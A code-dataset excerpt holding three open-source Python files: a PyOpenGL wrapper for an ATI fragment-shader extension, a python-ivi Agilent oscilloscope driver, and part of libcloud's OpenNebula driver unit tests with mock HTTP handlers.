repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
D4wN/brickv | src/build_data/windows/OpenGL/GL/ATI/text_fragment_shader.py | 4 | 3610 | '''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specifed using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object managment portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the API's of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ATI.text_fragment_shader import *
### END AUTOGENERATED SECTION | gpl-2.0 | 142,122,769,263,808,050 | 46.513158 | 69 | 0.789474 | false |
Diti24/python-ivi | ivi/agilent/agilentDSA90804A.py | 1 | 1686 | """
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentDSA90804A(agilent90000):
"Agilent Infiniium DSA90804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DSO90804A')
super(agilentDSA90804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 0
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 8e9
self._init_channels()
| mit | -3,106,518,787,911,555,000 | 37.318182 | 86 | 0.736655 | false |
mtekel/libcloud | libcloud/test/compute/test_opennebula.py | 46 | 46927 | # Copyright 2002-2009, Distributed Systems Architecture Group, Universidad
# Complutense de Madrid (dsa-research.org)
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
OpenNebula.org test suite.
"""
__docformat__ = 'epytext'
import unittest
import sys
from libcloud.utils.py3 import httplib
from libcloud.compute.base import Node, NodeImage, NodeSize, NodeState
from libcloud.compute.drivers.opennebula import OpenNebulaNodeDriver
from libcloud.compute.drivers.opennebula import OpenNebulaNetwork
from libcloud.compute.drivers.opennebula import OpenNebulaResponse
from libcloud.compute.drivers.opennebula import OpenNebulaNodeSize
from libcloud.compute.drivers.opennebula import ACTION
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.common.types import InvalidCredsError
from libcloud.test import MockResponse, MockHttp
from libcloud.test.compute import TestCaseMixin
from libcloud.test.secrets import OPENNEBULA_PARAMS
class OpenNebulaCaseMixin(TestCaseMixin):
def test_reboot_node_response(self):
pass
class OpenNebula_ResponseTests(unittest.TestCase):
XML = """<?xml version="1.0" encoding="UTF-8"?><root/>"""
def test_unauthorized_response(self):
http_response = MockResponse(httplib.UNAUTHORIZED,
OpenNebula_ResponseTests.XML,
headers={'content-type':
'application/xml'})
try:
OpenNebulaResponse(http_response, None).parse_body()
except InvalidCredsError:
exceptionType = sys.exc_info()[0]
self.assertEqual(exceptionType, type(InvalidCredsError()))
class OpenNebula_1_4_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v1.4.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_1_4_MockHttp, OpenNebula_1_4_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('1.4',))
def test_create_node(self):
"""
Test create_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
size = NodeSize(id=1, name='small', ram=None, disk=None,
bandwidth=None, price=None, driver=self.driver)
networks = list()
networks.append(OpenNebulaNetwork(id=5, name='Network 5',
address='192.168.0.0', size=256, driver=self.driver))
networks.append(OpenNebulaNetwork(id=15, name='Network 15',
address='192.168.1.0', size=256, driver=self.driver))
node = self.driver.create_node(name='Compute 5', image=image,
size=size, networks=networks)
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.extra['dev'], 'sda1')
def test_destroy_node(self):
"""
Test destroy_node functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_nodes(self):
"""
Test list_nodes functionality.
"""
nodes = self.driver.list_nodes()
self.assertEqual(len(nodes), 3)
node = nodes[0]
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.extra['dev'], 'sda1')
node = nodes[1]
self.assertEqual(node.id, '15')
self.assertEqual(node.name, 'Compute 15')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.2')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.2')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '15')
self.assertEqual(node.image.extra['dev'], 'sda1')
node = nodes[2]
self.assertEqual(node.id, '25')
self.assertEqual(node.name, 'Compute 25')
self.assertEqual(node.state,
NodeState.UNKNOWN)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.3')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.3')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image, None)
def test_list_images(self):
"""
Test list_images functionality.
"""
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
self.assertEqual(image.id, '5')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['size'], '2048')
self.assertEqual(image.extra['url'],
'file:///images/ubuntu/jaunty.img')
image = images[1]
self.assertEqual(image.id, '15')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['size'], '2048')
self.assertEqual(image.extra['url'],
'file:///images/ubuntu/jaunty.img')
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
def test_list_locations(self):
"""
Test list_locations functionality.
"""
locations = self.driver.list_locations()
self.assertEqual(len(locations), 1)
location = locations[0]
self.assertEqual(location.id, '0')
self.assertEqual(location.name, '')
self.assertEqual(location.country, '')
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
def test_ex_node_action(self):
"""
Test ex_node_action functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.ex_node_action(node, ACTION.STOP)
self.assertTrue(ret)
class OpenNebula_2_0_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v2.0 through v2.2.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_2_0_MockHttp, OpenNebula_2_0_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('2.0',))
def test_create_node(self):
"""
Test create_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
size = OpenNebulaNodeSize(id=1, name='small', ram=1024, cpu=1,
disk=None, bandwidth=None, price=None,
driver=self.driver)
networks = list()
networks.append(OpenNebulaNetwork(id=5, name='Network 5',
address='192.168.0.0', size=256, driver=self.driver))
networks.append(OpenNebulaNetwork(id=15, name='Network 15',
address='192.168.1.0', size=256, driver=self.driver))
context = {'hostname': 'compute-5'}
node = self.driver.create_node(name='Compute 5', image=image,
size=size, networks=networks,
context=context)
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([s for s in self.driver.list_sizes()
if s.id == node.size.id]) == 1)
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-5')
def test_destroy_node(self):
"""
Test destroy_node functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_nodes(self):
"""
Test list_nodes functionality.
"""
nodes = self.driver.list_nodes()
self.assertEqual(len(nodes), 3)
node = nodes[0]
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([size for size in self.driver.list_sizes()
if size.id == node.size.id]) == 1)
self.assertEqual(node.size.id, '1')
self.assertEqual(node.size.name, 'small')
self.assertEqual(node.size.ram, 1024)
self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu,
int))
self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu,
int))
self.assertEqual(node.size.cpu, 1)
self.assertEqual(node.size.vcpu, None)
self.assertEqual(node.size.disk, None)
self.assertEqual(node.size.bandwidth, None)
self.assertEqual(node.size.price, None)
self.assertTrue(len([image for image in self.driver.list_images()
if image.id == node.image.id]) == 1)
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-5')
node = nodes[1]
self.assertEqual(node.id, '15')
self.assertEqual(node.name, 'Compute 15')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.2')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:02')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.2')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:02')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([size for size in self.driver.list_sizes()
if size.id == node.size.id]) == 1)
self.assertEqual(node.size.id, '1')
self.assertEqual(node.size.name, 'small')
self.assertEqual(node.size.ram, 1024)
self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu,
int))
self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu,
int))
self.assertEqual(node.size.cpu, 1)
self.assertEqual(node.size.vcpu, None)
self.assertEqual(node.size.disk, None)
self.assertEqual(node.size.bandwidth, None)
self.assertEqual(node.size.price, None)
self.assertTrue(len([image for image in self.driver.list_images()
if image.id == node.image.id]) == 1)
self.assertEqual(node.image.id, '15')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-15')
node = nodes[2]
self.assertEqual(node.id, '25')
self.assertEqual(node.name, 'Compute 25')
self.assertEqual(node.state,
NodeState.UNKNOWN)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.3')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:03')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.3')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:03')
self.assertEqual(node.private_ips, [])
self.assertEqual(node.size, None)
self.assertEqual(node.image, None)
context = node.extra['context']
self.assertEqual(context, {})
def test_list_images(self):
"""
Test list_images functionality.
"""
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
self.assertEqual(image.id, '5')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['description'],
'Ubuntu 9.04 LAMP Description')
self.assertEqual(image.extra['type'], 'OS')
self.assertEqual(image.extra['size'], '2048')
image = images[1]
self.assertEqual(image.id, '15')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['description'],
'Ubuntu 9.04 LAMP Description')
self.assertEqual(image.extra['type'], 'OS')
self.assertEqual(image.extra['size'], '2048')
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 4)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[3]
self.assertEqual(size.id, '4')
self.assertEqual(size.name, 'custom')
self.assertEqual(size.ram, 0)
self.assertEqual(size.cpu, 0)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
def test_list_locations(self):
"""
Test list_locations functionality.
"""
locations = self.driver.list_locations()
self.assertEqual(len(locations), 1)
location = locations[0]
self.assertEqual(location.id, '0')
self.assertEqual(location.name, '')
self.assertEqual(location.country, '')
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
class OpenNebula_3_0_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.0.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_0_MockHttp, OpenNebula_3_0_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.0',))
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
self.assertEqual(network.extra['public'], 'YES')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
self.assertEqual(network.extra['public'], 'NO')
def test_ex_node_set_save_name(self):
"""
Test ex_node_action functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
node = Node(5, None, None, None, None, self.driver, image=image)
ret = self.driver.ex_node_set_save_name(node, 'test')
self.assertTrue(ret)
class OpenNebula_3_2_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.2.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_2_MockHttp, OpenNebula_3_2_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.2',))
def test_reboot_node(self):
"""
Test reboot_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
node = Node(5, None, None, None, None, self.driver, image=image)
ret = self.driver.reboot_node(node)
self.assertTrue(ret)
def test_list_sizes(self):
"""
Test ex_list_networks functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
class OpenNebula_3_6_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.6.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_6_MockHttp, OpenNebula_3_6_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.6',))
def test_create_volume(self):
new_volume = self.driver.create_volume(1000, 'test-volume')
self.assertEqual(new_volume.id, '5')
self.assertEqual(new_volume.size, 1000)
self.assertEqual(new_volume.name, 'test-volume')
def test_destroy_volume(self):
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
ret = self.driver.destroy_volume(image)
self.assertTrue(ret)
def test_attach_volume(self):
nodes = self.driver.list_nodes()
node = nodes[0]
images = self.driver.list_images()
image = images[0]
ret = self.driver.attach_volume(node, image, 'sda')
self.assertTrue(ret)
def test_detach_volume(self):
images = self.driver.list_images()
image = images[1]
ret = self.driver.detach_volume(image)
self.assertTrue(ret)
nodes = self.driver.list_nodes()
# node with only a single associated image
node = nodes[1]
ret = self.driver.detach_volume(node.image)
self.assertFalse(ret)
def test_list_volumes(self):
volumes = self.driver.list_volumes()
self.assertEqual(len(volumes), 2)
volume = volumes[0]
self.assertEqual(volume.id, '5')
self.assertEqual(volume.size, 2048)
self.assertEqual(volume.name, 'Ubuntu 9.04 LAMP')
volume = volumes[1]
self.assertEqual(volume.id, '15')
self.assertEqual(volume.size, 1024)
self.assertEqual(volume.name, 'Debian Sid')
class OpenNebula_3_8_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.8.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_8_MockHttp, OpenNebula_3_8_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.8',))
def test_list_sizes(self):
"""
Test ex_list_networks functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
class OpenNebula_1_4_MockHttp(MockHttp):
"""
Mock HTTP server for testing v1.4 of the OpenNebula.org compute driver.
"""
fixtures = ComputeFileFixtures('opennebula_1_4')
def _compute(self, method, url, body, headers):
"""
Compute pool resources.
"""
if method == 'GET':
body = self.fixtures.load('computes.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('compute_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _storage(self, method, url, body, headers):
"""
Storage pool resources.
"""
if method == 'GET':
body = self.fixtures.load('storage.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('disk_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures.load('networks.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _compute_15(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
